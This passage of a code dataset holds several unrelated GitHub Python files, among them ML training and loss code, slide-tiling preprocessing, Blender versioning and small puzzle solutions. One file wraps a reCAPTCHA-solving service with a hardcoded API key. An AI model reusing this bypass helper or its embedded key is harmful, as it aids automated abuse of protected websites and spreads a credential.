reduction='none')\r\n conf_loss = torch.sum(conf_loss * weights) / torch.sum(weights)\r\n\r\n loss = class_loss + 10. * loc_loss + 10. 
* conf_loss\r\n loss_dict = {\"cost\": loss, \"class_loss\": class_loss,\r\n \"loc_loss\": loc_loss, \"overlap_loss\": conf_loss}\r\n return loss_dict\r\n","repo_name":"Rheelt/SSAD_pytorch","sub_path":"loss_function.py","file_name":"loss_function.py","file_ext":"py","file_size_in_byte":2469,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"53"} +{"seq_id":"17374818874","text":"from anticaptchaofficial.recaptchav2proxyless import *\n\ndef captchaSolver(link,chave_captcha):\n solver = recaptchaV2Proxyless()\n solver.set_verbose(1)\n solver.set_key('96c0546d6b117e6808ec6326fc98df0d')\n solver.set_website_url(link)\n solver.set_website_key(chave_captcha)\n\n resposta = solver.solve_and_return_solution()\n\n if(resposta != 0):\n return resposta\n else:\n print(solver.err_string)","repo_name":"MuriloLima00/Poc_Afya","sub_path":"poc_afya/AntiCaptcha.py","file_name":"AntiCaptcha.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70165712490","text":"import numpy as np, pandas as pd\r\nimport cv2,PIL,pyvips\r\nimport skimage.io as sk \r\nimport os,sys,glob,shutil,time,random,gc,warnings,logging,math, multiprocessing, argparse\r\nfrom datetime import timedelta\r\n\r\nfrom wsi import slide,filters,tiles,util\r\n\r\nSTART_TIME = time.time()\r\nlogging.basicConfig(level=logging.INFO)\r\nlogger = logging.getLogger()\r\n\r\nwarnings.filterwarnings(\"ignore\")\r\n\r\nparser = argparse.ArgumentParser()\r\nparser.add_argument(\"--dir_input_tif\")\r\nparser.add_argument(\"--file_meta\")\r\nparser.add_argument(\"--dir_output\")\r\nargs = parser.parse_args()\r\n\r\nDIR_INPUT_TIF = args.dir_input_tif\r\nFILE_INPUT_CSV = args.file_meta#'data/train_metadata_eRORy1H.csv'\r\nDIR_OUTPUT_TILES = f'./workspace/tiles/{args.dir_output}/'# ./workspace/tiles/train/\r\n\r\nPAGE_IX_MULS = {1:16,2:8,3:4,4:2}\r\nDIR_OUTPUT = {}\r\nDIR_OUTPUT[48] = f'{DIR_OUTPUT_TILES}/48/'\r\nDIR_OUTPUT[64] = f'{DIR_OUTPUT_TILES}/64/'\r\n\r\nPAGES_TO_EXTRACT = {}\r\nPAGES_TO_EXTRACT[48] = [2,3,4]\r\nPAGES_TO_EXTRACT[64] = [2,3,4]\r\n\r\nfor page in PAGES_TO_EXTRACT[48]:\r\n os.makedirs(f'{DIR_OUTPUT[48]}/{page}',exist_ok=True)\r\n\r\nfor page in PAGES_TO_EXTRACT[64]:\r\n os.makedirs(f'{DIR_OUTPUT[64]}/{page}',exist_ok=True)\r\n\r\nslide.SRC_TRAIN_DIR = args.dir_input_tif\r\nRANDOM_STATE = 41\r\ndef fix_seed(seed):\r\n random.seed(seed)\r\n os.environ['PYTHONHASHSEED'] = str(seed)\r\n np.random.seed(seed)\r\nfix_seed(RANDOM_STATE)\r\n\r\nlogger.info('done initial setup')\r\n\r\ndef save_tiles_for_page(cur_page,name,image_path,df_tissue_tiles,dir_output,logger):\r\n patch_size = PATCH_SIZES_ACT[cur_page]\r\n slide = pyvips.Image.new_from_file(image_path, page=cur_page)\r\n RES_MUL = PAGE_IX_MULS[cur_page] #2**(base_page-cur_page)\r\n for idx, row in df_tissue_tiles.iterrows():\r\n if row.tile_id==MAX_TILES_PER_PAGE[cur_page]: ##generated maximum tiles for page, exit\r\n break\r\n y = row['Row Start']\r\n x = row['Col Start']\r\n\r\n if (y<0 or x<0):\r\n warnings.warn(f\"bad coords for {name} x:{x} y:{y}\", RuntimeWarning) \r\n \r\n \r\n x1 = max(0,x)*RES_MUL\r\n y1 = max(0,y)*RES_MUL\r\n \r\n region_width = region_height = patch_size#PATCH_SIZES_ACT[cur_page]\r\n if x1 + region_width >slide.width:\r\n logger.info(f'reducing {name} since {x1} + {region_width} >{slide.width}')\r\n region_width = slide.width - x1\r\n if y1 + region_height >slide.height:\r\n logger.info(f'reducing {name} since {y1} + 
{region_height} >{slide.height}')\r\n region_height = slide.height - y1\r\n try:\r\n #method 2\r\n region = pyvips.Region.new(slide).fetch(x1, y1, region_width, region_height)\r\n bands = 3\r\n img = np.ndarray(\r\n buffer=region,\r\n dtype=np.uint8,\r\n shape=(region_height, region_width, bands))\r\n \r\n img = PIL.Image.fromarray(img)\r\n img.save(f'{dir_output}/{cur_page}/{name}_{idx}.jpeg', quality=90)\r\n except Exception as ex:\r\n logger.info(f'Failed for {name}. x: {x}, y: {y} x1: {x1}, y1: {y1} reg_w: {region_width}, reg_h: {region_height} ')\r\n logger.info(f'slide width: {slide.width} height: {slide.height} cur_page: {cur_page}' )\r\n logger.info(f'exc: {ex}')\r\n logger.info(f\"{os.popen('df -h').read()}\")\r\n \r\n\r\ndef gen_tiles(DIR_INPUT_TIF,dir_output,df_tile_data,pages_to_extract):\r\n ix=-1\r\n for name,df in list(df_tile_data.groupby('tissue_id')):\r\n ix+=1\r\n logger.info(f'processing {ix}: {name}')\r\n image_path = f'{DIR_INPUT_TIF}/{name}.tif'\r\n df = df.sort_values(by='tile_id').reset_index(drop=True)\r\n for page in pages_to_extract:\r\n save_tiles_for_page(page,name,image_path,df,dir_output,logger)\r\n\r\n\r\ndef generate_tiles_for_slide_list(slide_names,dir_output,pages_to_extract):\r\n for slide_name in slide_names:\r\n # ##generate tiles\r\n df = pd.read_csv(f'{slide.TILE_DATA_DIR}/{slide_name}-tile_data.csv',skiprows=14).sort_values(by='Score',ascending=False).reset_index(drop=True)\r\n #filter scores\r\n df1 = df[df.Score>0]\r\n if len(df1)>=1:\r\n df = df1\r\n else:\r\n logger.info(f'Ignoring Score: {slide_name}')\r\n \r\n df['tile_id'] = df.index\r\n df['tissue_id'] = slide_name\r\n df['filename'] = df['tissue_id'] + '.tif'\r\n gen_tiles(DIR_INPUT_TIF,dir_output,df,pages_to_extract)\r\n \r\n\r\ndef multiprocess_generate_tiles(dir_output,pages_to_extract):\r\n slides_list = list(df_input.tissue_id.unique())\r\n num_slides = len(slides_list)\r\n\r\n num_processes = min(multiprocessing.cpu_count(),5)\r\n pool = multiprocessing.Pool(num_processes)\r\n\r\n if num_processes > num_slides:\r\n num_processes = num_slides\r\n slides_per_process = num_slides / num_processes\r\n\r\n tasks = []\r\n for num_process in range(1, num_processes + 1):\r\n start_index = (num_process - 1) * slides_per_process + 1\r\n end_index = num_process * slides_per_process\r\n start_index = int(start_index)\r\n end_index = int(end_index)\r\n sublist = slides_list[start_index - 1:end_index]\r\n tasks.append((sublist,dir_output,pages_to_extract))\r\n logger.info(f\"Task # {num_process} Process slides {sublist}\")\r\n \r\n # start tasks\r\n results = []\r\n for t in tasks:\r\n results.append(pool.apply_async(generate_tiles_for_slide_list, t))\r\n\r\n for result in results:\r\n _ = result.get()\r\n\r\ndf_input = pd.read_csv(FILE_INPUT_CSV)\r\ndf_input = df_input[df_input.filename.isin([f for f in os.listdir(DIR_INPUT_TIF) if f.split('.')[-1]=='tif'])].reset_index(drop=True)\r\ndf_input = df_input[['filename']]\r\ndf_input['tissue_id'] = df_input.filename.str.split('.').str[0].values\r\nlogger.info('loaded training file')\r\n\r\n\r\n##Generate tiles\r\nlogger.info('************** GENERATING MASKS *********************')\r\n\r\nNAMES = [n.split('.')[0] for n in df_input.filename.values]\r\ndf_submission = pd.DataFrame()\r\n\r\nn_files = len(NAMES)\r\nfilters.multiprocess_apply_filters_to_images(image_name_list=NAMES)\r\nelapsed = time.time() - START_TIME\r\nlogger.info(f'######### DONE GENERATING MASKS ######## TOTAL TIME: {timedelta(seconds=elapsed)}')\r\ngc.collect()\r\n\r\n##48\r\nBASE_SZ 
= 48\r\ntiles.TILE_SIZE_BASE = BASE_SZ\r\nslide.TILE_DATA_DIR = os.path.join(slide.BASE_DIR, f\"tile_data/{BASE_SZ}\")\r\nslide.TOP_TILES_DIR = os.path.join(slide.BASE_DIR, f\"top_tiles/{BASE_SZ}\")\r\n\r\nMAX_TILES_PER_PAGE = {1:24,2:48,3:96,4:128} #maximum number of tiles to extract per page\r\nPATCH_SIZES_ACT = {1:768,2:384,3:192,4:96}#patch size to extract for each page\r\n\r\nlogger.info(f'********* GENERATING TILE META {BASE_SZ} **********')\r\ntiles.multiprocess_filtered_images_to_tiles(image_list=NAMES, display=False, save_summary=False, save_data=True, save_top_tiles=False)\r\nelapsed = time.time() - START_TIME\r\nlogger.info(f'######### DONE GENERATING TILE META {BASE_SZ} ######## TOTAL TIME: {timedelta(seconds=elapsed)}')\r\ngc.collect()\r\n\r\nlogger.info(f'********* GENERATING TILES {BASE_SZ} **********')\r\n\r\nmultiprocess_generate_tiles(dir_output=DIR_OUTPUT[BASE_SZ],pages_to_extract=PAGES_TO_EXTRACT[BASE_SZ])\r\n\r\nelapsed = time.time() - START_TIME\r\nlogger.info(f'######### DONE GENERATING TILES {BASE_SZ} ######## TOTAL TIME: {timedelta(seconds=elapsed)}')\r\ngc.collect()\r\n\r\n##64\r\nBASE_SZ = 64\r\ntiles.TILE_SIZE_BASE = BASE_SZ\r\nslide.TILE_DATA_DIR = os.path.join(slide.BASE_DIR, f\"tile_data/{BASE_SZ}\")\r\nslide.TOP_TILES_DIR = os.path.join(slide.BASE_DIR, f\"top_tiles/{BASE_SZ}\")\r\n\r\nMAX_TILES_PER_PAGE = {2:48,3:64,4:128} #maximum number of tiles to extract per page\r\nPATCH_SIZES_ACT = {2:512,3:256,4:128}#patch size to extract for each page\r\n\r\nlogger.info(f'********* GENERATING TILE META {BASE_SZ} **********')\r\ntiles.multiprocess_filtered_images_to_tiles(image_list=NAMES, display=False, save_summary=False, save_data=True, save_top_tiles=False)\r\nelapsed = time.time() - START_TIME\r\nlogger.info(f'######### DONE GENERATING TILE META {BASE_SZ} ######## TOTAL TIME: {timedelta(seconds=elapsed)}')\r\ngc.collect()\r\n\r\nlogger.info(f'********* GENERATING TILES {BASE_SZ} **********')\r\n\r\nmultiprocess_generate_tiles(dir_output=DIR_OUTPUT[BASE_SZ],pages_to_extract=PAGES_TO_EXTRACT[BASE_SZ])\r\n\r\nelapsed = time.time() - START_TIME\r\nlogger.info(f'######### DONE GENERATING TILES {BASE_SZ} ######## TOTAL TIME: {timedelta(seconds=elapsed)}')\r\ngc.collect()\r\n","repo_name":"drivendataorg/tissuenet-cervical-biopsies","sub_path":"2nd Place/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":8299,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"53"} +{"seq_id":"18593189819","text":"# flake8: noqa\nfrom ward import test\n\nfrom turbo_chat import *\nfrom turbo_chat.utils.tokens import count_tokens, get_max_tokens_length\n\n\n@test(\"contains returns True when memory filter works\")\nasync def test_memory_filter():\n @turbo(memory_class=LocalTruncatedMemory)\n async def example(zodiac: str, memory):\n for _ in range(50_000):\n yield User(content=\"You are a fortune teller\" * 500)\n\n messages = await memory.prepare_prompt()\n num_tokens = count_tokens(messages, memory.model)\n assert num_tokens < get_max_tokens_length(memory.model)\n\n await example(zodiac=\"pisces\").run()\n","repo_name":"julep-ai/turbo-ai","sub_path":"tests/test_memory_filter.py","file_name":"test_memory_filter.py","file_ext":"py","file_size_in_byte":626,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"53"} +{"seq_id":"74522037288","text":"import sys\n\nN = int(sys.stdin.readline())\n\npeople = []\n\nfor i in range(N):\n 
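# each input line holds one person's weight and height, e.g. \"55 185\"\n 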
people.append(list(map(int, sys.stdin.readline().split())))\n\n\nfor i in range(N):\n rank = 1\n for ii in range(N):\n if people[i][0] < people[ii][0] and people[i][1] < people[ii][1]:\n rank = rank + 1\n print(rank, end=\" \")\n","repo_name":"silentcat21/BAEKJOON","sub_path":"브루트 포스/7568.py","file_name":"7568.py","file_ext":"py","file_size_in_byte":323,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"2656322475","text":"#estimate the \"real\" distribution of all arms\nimport random\nimport sys\nimport os \nimport getopt\nimport itertools\n\nfrom mako.template import Template\n\nargs = sys.argv[1:]\n\ndef get_arg(name):\n for arg in args:\n if arg.startswith(\"--\" + name):\n (name, value) = tuple(arg[2:].split(\"=\"))\n return value \n raise ValueError(\"Could not find argument named \" + name)\n\npath = get_arg(\"path\")\ntemplate_fn = get_arg(\"template_fn\") \nr0 = get_arg(\"r0\")\ndays = get_arg(\"days\")\ndatafile = get_arg(\"datafile\")\ndoses = get_arg(\"doses\")\n\nsamples = 1000\n\nrandom.seed(123)\nseeds = random.sample(range(1, 100000), samples)\n \narms = list(itertools.product('01', repeat=5))\nfor arm in arms:\n for seed in seeds:\n template_vars = {\n 'label': str(seed) + \"_\" + \"\".join(arm),\n 'seed': seed,\n 'vaccine_priorities': \",\".join(arm),\n 'R0': r0,\n 'run_length': days,\n 'data_file': datafile,\n 'doses': doses\n }\n flute_dir = path + \"/\" + \"\".join(arm) + \"/\" + str(seed) + \"/\"\n os.makedirs(flute_dir)\n t = Template(filename=template_fn, strict_undefined=True, \\\n default_filters=['decode.utf8'], \\\n input_encoding='utf-8', \\\n output_encoding='utf-8')\n r = t.render(**template_vars)\n f = open(flute_dir + 'flute.config', 'w')\n f.write(r)\n","repo_name":"plibin/flute","sub_path":"configs/bandits/pre-vaccination.real.py","file_name":"pre-vaccination.real.py","file_ext":"py","file_size_in_byte":1473,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"32617488787","text":"import bpy\n\nfrom bpy.app.handlers import persistent\n\n\ndef check_is_new_shading_ntree(node_tree):\n for node in node_tree.nodes:\n # If material has any node with ONLY new shading system\n # compatibility then it's considered a Cycles material\n # and versioning code would need to perform on it.\n #\n # We can not check for whether NEW_SHADING in compatibility\n # because some nodes could have compatibility with both old\n # and new shading system and they can't be used for any\n # decision here.\n if node.shading_compatibility == {'NEW_SHADING'}:\n return True\n\n # If node is only compatible with old shading system\n # then material can not be Cycles material and we\n # can stop iterating nodes now.\n if node.shading_compatibility == {'OLD_SHADING'}:\n return False\n return False\n\n\ndef check_is_new_shading_material(material):\n if not material.node_tree:\n return False\n return check_is_new_shading_ntree(material.node_tree)\n\n\ndef check_is_new_shading_world(world):\n if not world.node_tree:\n return False\n return check_is_new_shading_ntree(world.node_tree)\n\n\ndef check_is_new_shading_lamp(lamp):\n if not lamp.node_tree:\n return False\n return check_is_new_shading_ntree(lamp.node_tree)\n\n\ndef foreach_notree_node(nodetree, callback, traversed):\n if nodetree in traversed:\n return\n traversed.add(nodetree)\n for node in nodetree.nodes:\n callback(node)\n if node.bl_idname == 'ShaderNodeGroup':\n foreach_notree_node(node.node_tree, callback, 
traversed)\n\n\ndef foreach_cycles_node(callback):\n traversed = set()\n for material in bpy.data.materials:\n if check_is_new_shading_material(material):\n foreach_notree_node(material.node_tree,\n callback,\n traversed)\n for world in bpy.data.worlds:\n if check_is_new_shading_world(world):\n foreach_notree_node(world.node_tree,\n callback,\n traversed)\n for lamp in bpy.data.lamps:\n if check_is_new_shading_lamp(lamp):\n foreach_notree_node(lamp.node_tree,\n callback,\n traversed)\n\n\ndef mapping_node_order_flip(node):\n \"\"\"\n Flip euler order of mapping shader node\n \"\"\"\n if node.bl_idname == 'ShaderNodeMapping':\n rot = node.rotation.copy()\n rot.order = 'ZYX'\n quat = rot.to_quaternion()\n node.rotation = quat.to_euler('XYZ')\n\n\n@persistent\ndef do_versions(self):\n # We don't modify startup file because it assumes to\n # have all the default values only.\n if not bpy.data.is_saved:\n return\n\n # Clamp Direct/Indirect separation in 270\n if bpy.data.version <= (2, 70, 0):\n for scene in bpy.data.scenes:\n cscene = scene.cycles\n sample_clamp = cscene.get(\"sample_clamp\", False)\n if (sample_clamp and\n not cscene.is_property_set(\"sample_clamp_direct\") and\n not cscene.is_property_set(\"sample_clamp_indirect\")):\n\n cscene.sample_clamp_direct = sample_clamp\n cscene.sample_clamp_indirect = sample_clamp\n\n # Change of Volume Bounces in 271\n if bpy.data.version <= (2, 71, 0):\n for scene in bpy.data.scenes:\n cscene = scene.cycles\n if not cscene.is_property_set(\"volume_bounces\"):\n cscene.volume_bounces = 1\n\n # Caustics Reflective/Refractive separation in 272\n if bpy.data.version <= (2, 72, 0):\n for scene in bpy.data.scenes:\n cscene = scene.cycles\n if (cscene.get(\"no_caustics\", False) and\n not cscene.is_property_set(\"caustics_reflective\") and\n not cscene.is_property_set(\"caustics_refractive\")):\n\n cscene.caustics_reflective = False\n cscene.caustics_refractive = False\n\n # Euler order was ZYX in previous versions.\n if bpy.data.version <= (2, 73, 4):\n foreach_cycles_node(mapping_node_order_flip)\n","repo_name":"Squashwell/bepuik","sub_path":"intern/cycles/blender/addon/version_update.py","file_name":"version_update.py","file_ext":"py","file_size_in_byte":4215,"program_lang":"python","lang":"en","doc_type":"code","stars":57,"dataset":"github-code","pt":"53"} +{"seq_id":"23090264611","text":"#!/usr/bin/env python3\n\ndef between_markers(text: str, begin: str, end: str) -> str:\n if begin in text:\n begin_index = text.find(begin) + len(begin)\n else:\n begin_index = 0\n\n if end in text:\n end_index = text.find(end)\n else:\n end_index = len(text)\n return text[begin_index:end_index]\n\n\n\n\ndef between_markers_2(text: str, begin: str, end: str) -> str:\n\n m1 = 0 if text.find(begin) < 0 else text.find(begin) + len(begin)\n\n m2 = len(text) if text.find(end) < 0 else text.find(end)\n\n return text[m1:m2]\n\n\n\nif __name__ == '__main__':\n print(between_markers('What is >apple<', '>', '<'))\n","repo_name":"phuonghtruong/python","sub_path":"Checkio/between_markers.py","file_name":"between_markers.py","file_ext":"py","file_size_in_byte":630,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13888890961","text":"from built.evaluation_scheduler import EvaluationScheduler\nimport os\nimport math\nimport time\nimport logging\nimport torch\nimport tqdm\nimport numpy as np\nimport wandb\nimport pandas as pd\n\nfrom torch.utils.tensorboard import SummaryWriter\nfrom torch.utils.data import DataLoader\nfrom 
collections import defaultdict\n\n\nfrom built.builder import Builder\nfrom built.checkpoint_manager import CheckpointManager\nfrom built.early_stopper import EarlyStopper\nfrom built.logger import LogWriter, WandbWriter\nfrom built.utils.util_functions import *\n\nclass TrainerBase(object):\n \"\"\"Train and evaluate a model according to the configuration\"\"\"\n def __init__(self, config, builder, wandb_run=None, wandb_conf=None, working_dir=None, use_accelerator=False):\n\n self.config = config\n\n seed_everything(self.config.train.random_state)\n\n self.builder = builder\n self.es = EarlyStopper(mode=config.train.early_stopper.mode) \n self.eval_scheduler = EvaluationScheduler(config.evaluation.boundary_scores, config.evaluation.intervals)\n self.wandb_run = wandb_run\n self.wandb_conf = wandb_conf\n self.working_dir = working_dir\n\n if self.working_dir is None:\n self.working_dir = os.path.join(self.config.train.dir, self.config.train.name)\n \n self.cm = CheckpointManager(self.working_dir)\n\n if self.wandb_run is None:\n self.writer = LogWriter()\n else:\n self.writer = WandbWriter(run=self.wandb_run)\n\n self.use_accelerator = use_accelerator\n if self.use_accelerator:\n from accelerate import Accelerator\n\n self.accelerator = Accelerator()\n self.device = self.accelerator.device\n else:\n self.device = torch.device('cuda' if torch.cuda.is_available() else 'cpu') \n\n self.build_classes()\n\n def prepare_directories(self):\n os.makedirs(os.path.join(self.working_dir,\n 'checkpoint'), exist_ok=True)\n\n # deprecated, need to check and improve\n def forward(self):\n self.model.eval()\n\n for dataloader in self.dataloaders:\n dataloader = dataloader['dataloader']\n \n batch_size = self.config.evaluation.batch_size\n total_size = len(dataloader.dataset)\n total_step = math.ceil(total_size / batch_size)\n \n all_outputs = []\n all_targets = None\n aggregated_metric_dict = defaultdict(list)\n epoch = 0\n with torch.no_grad():\n tbar = tqdm.tqdm(enumerate(dataloader), total=total_step, bar_format='{l_bar}{bar:10}{r_bar}{bar:-10b}')\n for i, (inputs, targets) in tbar:\n output = self.forward_hook(self.model, inputs, targets, device=self.device)\n output = self.post_forward_hook(\n outputs=output, inputs=inputs, targets=targets, data=None, is_train=True)\n\n metric_dict = self.metric_fn(\n outputs=output, targets=targets, data=inputs, is_train=False) \n\n log_dict = {}\n log_dict['lr'] = self.optimizer.param_groups[0]['lr']\n log_dict.update(metric_dict)\n\n for key, value in log_dict.items():\n aggregated_metric_dict[key].append(value)\n \n f_epoch = epoch + i / total_step\n\n if isinstance(output, list) or isinstance(output, tuple):\n for i in range(len(output)):\n if len(all_outputs) < len(output):\n all_outputs.append([])\n all_outputs[i].append(output[i])\n else:\n all_outputs.append(output)\n \n if isinstance(targets, dict):\n if all_targets is None:\n all_targets = defaultdict(list)\n \n for k in targets:\n all_targets[k].append(targets[k]) \n else:\n if all_targets is None:\n all_targets = [] \n all_targets.append(targets)\n \n self.logger_fn(self.writer, split='test', outputs=output, labels=targets, data=inputs,\n log_dict=log_dict, epoch=epoch, step=i, num_steps_in_epoch=total_step)\n\n aggregated_metric_dict = {f'avg_{key}':np.mean(value) for key, value in aggregated_metric_dict.items()}\n self.logger_fn(self.writer, split='test', outputs=all_outputs, labels=all_targets,\n log_dict=aggregated_metric_dict, epoch=epoch) \n \n if isinstance(all_outputs[0], list):\n for i in 
range(len(all_outputs)):\n all_outputs[i] = torch.cat(all_outputs[i], dim=0)\n else:\n all_outputs = torch.cat(all_outputs, dim=0)\n \n if isinstance(all_targets, dict):\n for k in all_targets:\n if isinstance(all_targets[k][0], torch.Tensor):\n all_targets[k] = torch.cat(all_targets[k], dim=0)\n else:\n # if it's a list, \n tmp = []\n for v in all_targets[k]:\n tmp.extend(v)\n all_targets[k] = tmp\n else:\n all_targets = torch.cat(all_targets, dim=0)\n \n return all_outputs, all_targets\n\n # def evaluate_single_epoch(self, dataloader, epoch, split):\n # self.model.eval()\n\n # batch_size = self.config.evaluation.batch_size\n # total_size = len(dataloader.dataset)\n # total_step = math.ceil(total_size / batch_size)\n\n # with torch.no_grad():\n # all_outputs = []\n # all_targets = None\n # aggregated_metric_dict = defaultdict(list)\n # tbar = tqdm.tqdm(enumerate(dataloader), total=total_step, bar_format='{l_bar}{bar:10}{r_bar}{bar:-10b}')\n # for i, (inputs, targets) in tbar:\n # output = self.forward_hook(self.model, inputs, targets, device=self.device)\n # output = self.post_forward_hook(\n # outputs=output, inputs=inputs, targets=targets, data=None, is_train=True)\n\n # loss = self.loss_fn(output, targets, device=self.device)\n\n # if isinstance(loss, dict):\n # loss_dict = loss\n # loss = loss_dict['loss']\n # else:\n # loss_dict = {'loss': loss}\n\n # metric_dict = self.metric_fn(\n # outputs=output, targets=targets, data=inputs, is_train=False) \n\n # log_dict = {key: value.item() for key, value in loss_dict.items()}\n # log_dict['lr'] = self.optimizer.param_groups[0]['lr']\n # log_dict.update(metric_dict)\n\n # for key, value in log_dict.items():\n # aggregated_metric_dict[key].append(value)\n\n # f_epoch = epoch + i / total_step\n # tbar.set_description(f'[ val ] {f_epoch: .2f} epoch')\n # tbar.set_postfix(\n # lr=self.optimizer.param_groups[0]['lr'], loss=f'{loss.item():.5f}')\n \n # if isinstance(output, list) or isinstance(output, tuple):\n # for i in range(len(output)):\n # if len(all_outputs) < len(output):\n # all_outputs.append([])\n # all_outputs[i].append(output[i])\n # else:\n # all_outputs.append(output)\n \n # if isinstance(targets, dict):\n # if all_targets is None:\n # all_targets = defaultdict(list)\n \n # for k in targets:\n # all_targets[k].append(targets[k]) \n # else:\n # if all_targets is None:\n # all_targets = [] \n # all_targets.append(targets)\n \n # self.logger_fn(self.writer, split=split, outputs=output, labels=targets, data=inputs,\n # log_dict=log_dict, epoch=epoch, step=i, num_steps_in_epoch=total_step)\n \n # aggregated_metric_dict = {f'avg_{key}':np.mean(value) for key, value in aggregated_metric_dict.items()}\n # self.logger_fn(self.writer, split=split, outputs=all_outputs, labels=all_targets,\n # log_dict=aggregated_metric_dict, epoch=epoch)\n # return aggregated_metric_dict[f'[{split}]_avg_score']\n\n # def train_single_epoch(self, dataloader, epoch, split):\n # self.model.train()\n\n # # loop calc\n # batch_size = self.config.train.batch_size\n # total_size = len(dataloader.dataset)\n # total_step = math.ceil(total_size / batch_size)\n\n # tbar = tqdm.tqdm(enumerate(dataloader), total=total_step, bar_format='{l_bar}{bar:10}{r_bar}{bar:-10b}')\n # for i, (inputs, targets) in tbar:\n # output = self.forward_hook(self.model, inputs, targets, device=self.device)\n # output = self.post_forward_hook(\n # outputs=output, inputs=inputs, targets=targets, data=None, is_train=True)\n\n # loss = self.loss_fn(output, targets, device=self.device)\n\n # 
metric_dict = self.metric_fn(\n # outputs=output, targets=targets, data=inputs, is_train=True)\n\n # if isinstance(loss, dict):\n # loss_dict = loss\n # loss = loss_dict['loss']\n # else:\n # loss_dict = {'loss': loss}\n\n # # backward()\n # loss.backward()\n\n # # optimizer \n # if self.config.train.gradient_accumulation_step is None:\n # self.optimizer.step()\n # self.optimizer.zero_grad()\n # elif (i+1) % self.config.train.gradient_accumulation_step == 0:\n # self.optimizer.step()\n # self.optimizer.zero_grad()\n\n # log_dict = {key: value.item() for key, value in loss_dict.items()}\n # log_dict['lr'] = self.optimizer.param_groups[0]['lr']\n # log_dict.update(metric_dict)\n # log_dict.update({'epoch': epoch})\n\n # f_epoch = epoch + i / total_step\n # tbar.set_description(f'[train] {f_epoch: .2f} epoch')\n # tbar.set_postfix(\n # lr=self.optimizer.param_groups[0]['lr'], loss=f'{loss.item():.5f}')\n\n # self.logger_fn(self.writer, split=split, outputs=output, labels=targets,\n # log_dict=log_dict, epoch=epoch, step=i, num_steps_in_epoch=total_step)\n\n def calc_steps(self, dataloader, is_train):\n if is_train: \n batch_size = self.config.train.batch_size\n else:\n batch_size = self.config.evaluation.batch_size\n\n total_size = len(dataloader.dataset)\n total_step = math.ceil(total_size / batch_size)\n return total_step, batch_size\n\n def process_single_epoch(self, dataloader: DataLoader, epoch: int, is_train: bool, use_tbar: bool=True) -> float:\n self.model.train(is_train) \n \n total_step, batch_size = self.calc_steps(dataloader, is_train)\n logger = self.builder.build_logger_fn(self.config, writer=self.writer, epoch=epoch, total_step=total_step, is_train=is_train)\n metric = self.builder.build_metric_fn(self.config)\n self.eval_scheduler.total_step = total_step\n \n with torch.set_grad_enabled(is_train):\n all_outputs = []\n all_targets = None\n \n if use_tbar:\n tbar = tqdm.tqdm(enumerate(dataloader), total=total_step, bar_format='{l_bar}{bar:10}{r_bar}{bar:-10b}')\n else:\n tbar = enumerate(dataloader)\n \n for step, (inputs, targets) in tbar:\n outputs = self.forward_hook(self.model, inputs, targets, device=self.device)\n # outputs = self.post_forward_hook(\n # outputs=outputs, inputs=inputs, targets=targets, data=None, is_train=True)\n\n loss = self.loss_fn(outputs, targets, device=self.device)\n if isinstance(loss, dict):\n loss_dict = loss\n loss = loss_dict['loss']\n else:\n loss_dict = {'loss': loss}\n \n lr = self.optimizer.param_groups[0]['lr']\n\n if not is_train:\n all_targets = self.aggregate(all_outputs, outputs, all_targets, targets)\n\n logger.batch_size = outputs.shape[0]\n logger.log('lr', lr, step)\n logger.log_dict(loss_dict, step)\n logger.log_dict(metric.calculate(outputs=outputs, targets=targets, extra_data=inputs, is_train=is_train), step)\n \n logger.write(step)\n\n if is_train:\n self.backward(loss=loss, step=step)\n\n if use_tbar:\n tbar.set_postfix(epoch=f'{epoch}', step=step, lr=lr, loss=f'{logger.loss:.5f}', score=f'{logger.score:.5f}')\n\n schedule_counter = (total_step * epoch) + step\n if is_train and self.eval_scheduler.scheduled(schedule_counter):\n tbar.set_description('evaluation...')\n val_score = self.process_single_epoch(self.val_dataloader, epoch, is_train=False, use_tbar=False)\n _, save_ckpt = self.es(val_score)\n if save_ckpt: \n tbar.set_description(f'best: {val_score}')\n self.cm.save(self.model, self.optimizer, epoch, val_score, keep=1, only_state_dict=self.config.train.save_state_dict_only)\n else:\n tbar.set_description(f'current: {val_score}')\n\n 
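# record this evaluation with the scheduler so it can pick the next checkpoint, then restore training mode\n 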
self.eval_scheduler.update(schedule_counter, val_score)\n self.model.train(is_train) \n\n return logger.score\n\n def backward(self, loss, step):\n if self.use_accelerator:\n self.accelerator.backward(loss)\n else:\n loss.backward()\n\n if self.config.train.gradient_accumulation_step is None:\n self.optimizer.step()\n self.scheduler.step()\n self.optimizer.zero_grad()\n elif (step+1) % self.config.train.gradient_accumulation_step == 0:\n self.optimizer.step()\n self.scheduler.step()\n self.optimizer.zero_grad()\n else:\n pass\n\n \n def aggregate(self, all_outputs, outputs, all_targets, targets):\n if isinstance(outputs, list) or isinstance(outputs, tuple):\n for i in range(len(outputs)):\n if len(all_outputs) < len(outputs):\n all_outputs.append([])\n all_outputs[i].append(outputs[i])\n else:\n all_outputs.append(outputs)\n \n if isinstance(targets, dict):\n if all_targets is None:\n all_targets = defaultdict(list)\n \n for k in targets:\n all_targets[k].append(targets[k]) \n else:\n if all_targets is None:\n all_targets = [] \n all_targets.append(targets)\n # all_targets may be (re)bound locally, so hand it back to the caller\n return all_targets\n\n def train(self, last_epoch, last_accuracy=None):\n ckpt_score = last_accuracy\n\n s_time = time.time()\n for epoch in range(last_epoch + 1, self.config.train.num_epochs):\n torch.cuda.synchronize()\n self.process_single_epoch(self.train_dataloader, epoch, is_train=True)\n torch.cuda.synchronize()\n\n e_time = time.time() \n print(f'Total time for training: {e_time - s_time} seconds.')\n \n return self.es.best_score\n\n def build_classes(self):\n # prepare directories\n self.prepare_directories()\n\n # build dataloaders\n self.dataloaders = self.builder.build_dataloaders(self.config)\n\n # build model\n self.model = self.builder.build_model(self.config)\n self.model = self.model.to(self.device)\n\n # build loss\n self.loss_fn = 